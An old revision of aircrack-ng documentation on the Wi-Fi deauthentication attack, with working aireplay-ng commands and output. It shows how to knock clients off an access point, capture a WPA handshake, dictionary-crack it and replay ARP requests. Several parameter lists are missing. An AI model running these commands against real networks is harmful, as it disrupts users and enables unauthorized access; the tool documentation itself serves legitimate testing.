This is an old revision of the document!
This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:
Of course, this attack is totally useless if there are no associated wireless client or on fake authentications.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
First, you determine a client which is currently connected. You need the MAC address for the following command:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
Here is what the ouput looks like:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
airmon-ng start ath0 airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another console) aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (wait for a few seconds) aircrack-ng -w /path/to/dictionary out.cap
Here the explaination of the above commands:
airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0
Where:
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:
Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
airmon-ng start wlan0 airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (switch to another console) aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
If the driver is wlan-ng/, you should run the airmon-ng script (unless you know what to type) otherwise the card won't be correctly setup for injection.
It is usually more effective to target a specific station using the -c parameter.
The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.
There can be several reasons and one or more can affect you:
See the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.
This section ONLY applies the latest SVN version and to some release candidate versions of the aircrack-ng suite. Once they are released as “stable” then the documentation above will be updated.
For directed deauthentications, aireplay-ng sends out a total of 128 packets for each deauth you specify. 64 packets are sent to the AP itself and 64 packets are sent to the client.
Here is a typical command:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0
Here is typical output:
12:35:25 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
Here is what the “[ 61|63 ACKs]” means: